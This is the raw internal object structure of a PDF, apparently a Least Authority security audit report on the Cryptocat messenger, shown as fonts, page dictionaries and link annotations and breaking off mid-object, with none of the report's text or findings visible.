Untitled - NFHN Reader

%PDF-1.4 %�� ReportLab Generated PDF document http://www.reportlab.com % 'BasicFonts': class PDFDictionary 1 0 obj % The standard fonts dictionary << /F1 2 0 R /F2 3 0 R /F3 74 0 R /F4 78 0 R /F5 81 0 R /F6 87 0 R /F7 97 0 R >> endobj % 'F1': class PDFType1Font 2 0 obj % Font Helvetica << /BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font >> endobj % 'F2': class PDFType1Font 3 0 obj % Font Helvetica-Bold << /BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER1': class PDFDictionary 4 0 obj << /A << /S /URI /Type /Action /URI (mailto:nathan@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 181.7729 689.7736 308.0929 701.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER2': class PDFDictionary 5 0 obj << /A << /S /URI /Type /Action /URI (mailto:zooko@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 217.5729 671.7736 339.9929 683.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER3': class PDFDictionary 6 0 obj << /A << /S /URI /Type /Action /URI (mailto:daira@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 186.2229 653.7736 304.1929 665.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER4': class PDFDictionary 7 0 obj << /A << /S /URI /Type /Action /URI (mailto:darius@LeastAuthority.com) >> /Border [ 0 0 0 ] /Rect [ 177.3329 635.7736 300.3029 647.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page1': class PDFPage 8 0 obj % Page dictionary << /Annots [ 4 0 R 5 0 R 6 0 R 7 0 R ] /Contents 178 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER5': class LinkAnnotation 9 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /Rect [ 62.69291 723.7736 107.1629 735.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER6': class LinkAnnotation 10 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 77 0 R /XYZ 62.69291 156.0236 0 ] /Rect [ 527.0227 723.7736 532.5827 735.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER7': class LinkAnnotation 11 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Rect [ 82.69291 705.7736 136.6129 717.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER8': class LinkAnnotation 12 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 741.0236 0 ] /Rect [ 527.0227 705.7736 532.5827 717.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER9': class LinkAnnotation 13 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /Rect [ 82.69291 687.7736 126.0429 699.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER10': class LinkAnnotation 14 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 597.0236 0 ] /Rect [ 527.0227 687.7736 532.5827 699.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER11': class LinkAnnotation 15 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Rect [ 102.6929 669.7736 218.8529 681.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER12': class LinkAnnotation 16 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 82 0 R /XYZ 62.69291 333.0236 0 ] /Rect [ 527.0227 669.7736 532.5827 681.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER13': class LinkAnnotation 17 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 651.7736 104.3629 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER14': class LinkAnnotation 18 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 651.7736 532.5827 663.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER15': class LinkAnnotation 19 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 633.7736 373.3729 645.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER16': class LinkAnnotation 20 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 83 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 527.0227 633.7736 532.5827 645.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER17': class LinkAnnotation 21 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 615.7736 310.0129 627.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER18': class LinkAnnotation 22 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 86 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 615.7736 532.5827 627.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER19': class LinkAnnotation 23 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 597.7736 209.9729 609.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER20': class LinkAnnotation 24 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 597.7736 532.5827 609.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER21': class LinkAnnotation 25 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /Rect [ 82.69291 579.7736 223.3129 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER22': class LinkAnnotation 26 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 471.0236 0 ] /Rect [ 527.0227 579.7736 532.5827 591.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER23': class LinkAnnotation 27 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Rect [ 102.6929 561.7736 149.9329 573.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER24': class LinkAnnotation 28 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 315.0236 0 ] /Rect [ 527.0227 561.7736 532.5827 573.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER25': class LinkAnnotation 29 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 102.6929 543.7736 201.0629 555.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER26': class LinkAnnotation 30 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 543.7736 532.5827 555.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER27': class LinkAnnotation 31 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Rect [ 102.6929 525.7736 254.9729 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER28': class LinkAnnotation 32 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 90 0 R /XYZ 62.69291 468.8236 0 ] /Rect [ 527.0227 525.7736 532.5827 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER29': class LinkAnnotation 33 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 507.7736 407.2629 519.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER30': class LinkAnnotation 34 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 91 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 527.0227 507.7736 532.5827 519.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER31': class LinkAnnotation 35 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 489.7736 350.5629 501.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER32': class LinkAnnotation 36 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 98 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 489.7736 532.5827 501.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER33': class LinkAnnotation 37 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 471.7736 456.7429 483.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER34': class LinkAnnotation 38 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 459.7736 169.9529 471.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER35': class LinkAnnotation 39 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 99 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 471.7736 532.5827 483.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER36': class LinkAnnotation 40 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 441.7736 300.5429 453.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER37': class LinkAnnotation 41 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 103 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 441.7736 532.5827 453.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER38': class LinkAnnotation 42 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 423.7736 339.4729 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER39': class LinkAnnotation 43 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 106 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 423.7736 532.5827 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER40': class LinkAnnotation 44 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 82.69291 405.7736 219.4129 417.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER41': class LinkAnnotation 45 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 405.7736 532.5827 417.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER42': class LinkAnnotation 46 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 102.6929 387.7736 193.8129 399.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER43': class LinkAnnotation 47 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 110 0 R /XYZ 62.69291 693.0236 0 ] /Rect [ 521.4627 387.7736 532.5827 399.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER44': class LinkAnnotation 48 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 369.7736 121.5829 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER45': class LinkAnnotation 49 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 369.7736 532.5827 381.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER46': class LinkAnnotation 50 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 351.7736 289.4429 363.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER47': class LinkAnnotation 51 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 351.7736 532.5827 363.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER48': class LinkAnnotation 52 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 102.6929 333.7736 169.9329 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER49': class LinkAnnotation 53 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 660.0236 0 ] /Rect [ 521.4627 333.7736 532.5827 345.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER50': class LinkAnnotation 54 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Rect [ 102.6929 315.7736 158.8129 327.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER51': class LinkAnnotation 55 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 459.0236 0 ] /Rect [ 521.4627 315.7736 532.5827 327.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER52': class LinkAnnotation 56 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Rect [ 102.6929 297.7736 239.3929 309.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER53': class LinkAnnotation 57 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 378.0236 0 ] /Rect [ 521.4627 297.7736 532.5827 309.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER54': class LinkAnnotation 58 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Rect [ 102.6929 279.7736 212.1729 291.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER55': class LinkAnnotation 59 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 309.0236 0 ] /Rect [ 521.4627 279.7736 532.5827 291.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER56': class LinkAnnotation 60 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Rect [ 82.69291 261.7736 209.9729 273.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER57': class LinkAnnotation 61 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 210.0236 0 ] /Rect [ 521.4627 261.7736 532.5827 273.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER58': class LinkAnnotation 62 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 243.7736 152.1529 255.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER59': class LinkAnnotation 63 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 243.7736 532.5827 255.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER60': class LinkAnnotation 64 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 82.69291 225.7736 158.2729 237.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER61': class LinkAnnotation 65 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 124 0 R /XYZ 62.69291 732.0236 0 ] /Rect [ 521.4627 225.7736 532.5827 237.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER62': class LinkAnnotation 66 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 207.7736 323.8629 219.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER63': class LinkAnnotation 67 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 133 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 207.7736 532.5827 219.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER64': class LinkAnnotation 68 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 189.7736 170.4729 201.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER65': class LinkAnnotation 69 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 189.7736 532.5827 201.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER66': class LinkAnnotation 70 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 62.69291 171.7736 240.5029 183.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER67': class LinkAnnotation 71 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 765.0236 0 ] /Rect [ 521.4627 171.7736 532.5827 183.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER68': class PDFDictionary 72 0 obj << /A << /S /URI /Type /Action /URI (https://LeastAuthority.com/) >> /Border [ 0 0 0 ] /Rect [ 83.0379 117.7736 153.1879 129.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER69': class PDFDictionary 73 0 obj << /A << /S /URI /Type /Action /URI (https://crypto.cat/) >> /Border [ 0 0 0 ] /Rect [ 394.8577 117.7736 440.7627 129.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F3': class PDFType1Font 74 0 obj % Font Helvetica-Oblique << /BaseFont /Helvetica-Oblique /Encoding /WinAnsiEncoding /Name /F3 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER70': class PDFDictionary 75 0 obj << /A << /S /URI /Type /Action /URI (https://www.opentechfund.org/) >> /Border [ 0 0 0 ] /Rect [ 203.7501 105.7736 312.7937 117.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER71': class PDFDictionary 76 0 obj << /A << /S /URI /Type /Action /URI (https://crypto.cat/) >> /Border [ 0 0 0 ] /Rect [ 320.6255 105.7736 368.4673 117.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page2': class PDFPage 77 0 obj % Page dictionary << /Annots [ 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R 15 0 R 16 0 R 17 0 R 18 0 R 19 0 R 20 0 R 21 0 R 22 0 R 23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R 29 0 R 30 0 R 31 0 R 32 0 R 33 0 R 34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R 43 0 R 44 0 R 45 0 R 46 0 R 47 0 R 48 0 R 49 0 R 50 0 R 51 0 R 52 0 R 53 0 R 54 0 R 55 0 R 56 0 R 57 0 R 58 0 R 59 0 R 60 0 R 61 0 R 62 0 R 63 0 R 64 0 R 65 0 R 66 0 R 67 0 R 68 0 R 69 0 R 70 0 R 71 0 R 72 0 R 73 0 R 75 0 R 76 0 R ] /Contents 179 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'F4': class PDFType1Font 78 0 obj % Font Courier << /BaseFont /Courier /Encoding /WinAnsiEncoding /Name /F4 /Subtype /Type1 /Type /Font >> endobj % 'Annot.NUMBER72': class LinkAnnotation 79 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 114 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 328.9129 363.7736 386.7029 375.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER73': class LinkAnnotation 80 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 139 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 62.69291 345.7736 164.9629 357.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F5': class PDFType1Font 81 0 obj % Font Helvetica-BoldOblique << /BaseFont /Helvetica-BoldOblique /Encoding /WinAnsiEncoding /Name /F5 /Subtype /Type1 /Type /Font >> endobj % 'Page3': class PDFPage 82 0 obj % Page dictionary << /Annots [ 79 0 R 80 0 R ] /Contents 180 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page4': class PDFPage 83 0 obj % Page dictionary << /Contents 181 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER74': class PDFDictionary 84 0 obj << /A << /S /URI /Type /Action /URI (https://en.wikipedia.org/wiki/Running%20key%20cipher) >> /Border [ 0 0 0 ] /Rect [ 230.2129 449.3736 312.4629 461.3736 ] /Subtype /Link /Type /Annot >> endobj % 'Page5': class PDFPage 85 0 obj % Page dictionary << /Annots [ 84 0 R ] /Contents 182 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page6': class PDFPage 86 0 obj % Page dictionary << /Contents 183 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'F6': class PDFType1Font 87 0 obj % Font Symbol << /BaseFont /Symbol /Encoding /SymbolEncoding /Name /F6 /Subtype /Type1 /Type /Font >> endobj % 'Page7': class PDFPage 88 0 obj % Page dictionary << /Contents 184 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER75': class PDFDictionary 89 0 obj << /A << /S /URI /Type /Action /URI (https://tools.ietf.org/html/rfc5869) >> /Border [ 0 0 0 ] /Rect [ 468.8538 690.7736 496.0738 702.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page8': class PDFPage 90 0 obj % Page dictionary << /Annots [ 89 0 R ] /Contents 185 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page9': class PDFPage 91 0 obj % Page dictionary << /Contents 186 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER76': class PDFDictionary 92 0 obj << /A << /S /URI /Type /Action /URI (https://api.jquery.com/replacewith/) >> /Border [ 0 0 0 ] /Rect [ 236.7169 753.7736 377.2122 765.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER77': class PDFDictionary 93 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/blob/master/CHANGELOG.md#cryptocat-2116) >> /Border [ 0 0 0 ] /Rect [ 111.5929 591.7736 144.3929 603.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER78': class PDFDictionary 94 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/strophe/strophejs/issues/35) >> /Border [ 0 0 0 ] /Rect [ 103.1689 525.7736 185.3249 537.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page10': class PDFPage 95 0 obj % Page dictionary << /Annots [ 92 0 R 93 0 R 94 0 R ] /Contents 187 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER79': class PDFDictionary 96 0 obj << /A << /S /URI /Type /Action /URI (http://xmpp.org/extensions/xep-0096.html) >> /Border [ 0 0 0 ] /Rect [ 282.6378 711.7736 351.369 723.7736 ] /Subtype /Link /Type /Annot >> endobj % 'F7': class PDFType1Font 97 0 obj % Font Courier-Bold << /BaseFont /Courier-Bold /Encoding /WinAnsiEncoding /Name /F7 /Subtype /Type1 /Type /Font >> endobj % 'Page11': class PDFPage 98 0 obj % Page dictionary << /Annots [ 96 0 R ] /Contents 188 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page12': class PDFPage 99 0 obj % Page dictionary << /Contents 189 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER80': class PDFDictionary 100 0 obj << /A << /S /URI /Type /Action /URI (http://googlesystem.blogspot.com/2013/04/anonymous-animals-in-google-drive.html) >> /Border [ 0 0 0 ] /Rect [ 480.8927 654.7736 531.1145 666.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER81': class PDFDictionary 101 0 obj << /A << /S /URI /Type /Action /URI (http://googlesystem.blogspot.com/2013/04/anonymous-animals-in-google-drive.html) >> /Border [ 0 0 0 ] /Rect [ 85.69291 642.7736 195.1329 654.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page13': class PDFPage 102 0 obj % Page dictionary << /Annots [ 100 0 R 101 0 R ] /Contents 190 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page14': class PDFPage 103 0 obj % Page dictionary << /Contents 191 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER82': class LinkAnnotation 104 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 477.2606 423.7736 531.7306 435.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER83': class LinkAnnotation 105 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 62.69291 411.7736 171.0729 423.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page15': class PDFPage 106 0 obj % Page dictionary << /Annots [ 104 0 R 105 0 R ] /Contents 192 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER84': class LinkAnnotation 107 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 441.7456 612.7736 530.7941 624.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER85': class LinkAnnotation 108 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 142 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 85.69291 600.7736 164.2039 612.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page16': class PDFPage 109 0 obj % Page dictionary << /Annots [ 107 0 R 108 0 R ] /Contents 193 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page17': class PDFPage 110 0 obj % Page dictionary << /Contents 194 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER86': class LinkAnnotation 111 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 474.0236 0 ] /Rect [ 429.104 402.7736 531.9734 414.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER87': class LinkAnnotation 112 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 88 0 R /XYZ 62.69291 474.0236 0 ] /Rect [ 62.69291 390.7736 98.27291 402.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER88': class PDFDictionary 113 0 obj << /A << /S /URI /Type /Action /URI (https://otr.cypherpunks.ca/Protocol-v3-4.0.0.html) >> /Border [ 0 0 0 ] /Rect [ 257.1003 99.77362 451.2777 111.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page18': class PDFPage 114 0 obj % Page dictionary << /Annots [ 111 0 R 112 0 R 113 0 R ] /Contents 195 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 177 0 R /Resources <> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER89': class PDFDictionary 115 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/cryptocat/cryptocat/blob/80f41fdfac5ed503d0837d8fa29f6364a73478be/CHANGELOG.md#cryptocat-2114) >> /Border [ 0 